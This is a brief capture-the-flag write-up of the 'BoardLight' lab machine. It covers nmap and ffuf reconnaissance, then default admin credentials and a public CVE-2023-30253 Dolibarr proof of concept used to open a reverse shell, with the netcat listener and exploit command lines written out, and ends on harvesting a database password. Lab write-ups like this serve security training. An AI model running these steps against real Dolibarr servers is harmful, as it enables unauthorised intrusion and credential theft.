BoardLight
Date: 14 Jun 2024
Author: H3cktor
Recon
Using nmap for recon:
nmap -sC -sV 10.10.11.11
-sV => attempts to determine the version of the service running on each open port
-sC => scans with the default NSE scripts, which are considered useful for discovery and safe to run

After the nmap scan we can see an Apache server listening on port 80.
Let's add the host to our hosts file:
sudo nano /etc/hosts

Let's first do a directory search to find any hidden files or directories. I will use gobuster for this:

Subdomain enumeration using ffuf:
ffuf -H "Host: FUZZ.board.htb" -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 6243
-fw 6243 => filters out responses with 6243 words (the default vhost page), so only virtual hosts that answer differently are shown

I found the subdomain crm.10.10.11.11.

I found the CRM panel.

Now I found Dolibarr version 17.0.0 and searched Google for any CVE.
I found CVE-2023-30253 for Dolibarr 17.0.0:
Reverse shell PoC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP code injection.
sudo python3 exploit.py http://crm.board.htb admin admin <your tun0 IP> 9000
Reverse shell listener => must be running first:
nc -nvlp 9000
First I started the listener and then executed exploit.py, providing the credentials as well as my attacker IP and the listening port. After executing it, I successfully got a reverse shell.

B0000000M!

I could not find a password or credentials there, but I did see the user name larissa.

I found the main database password in the file.
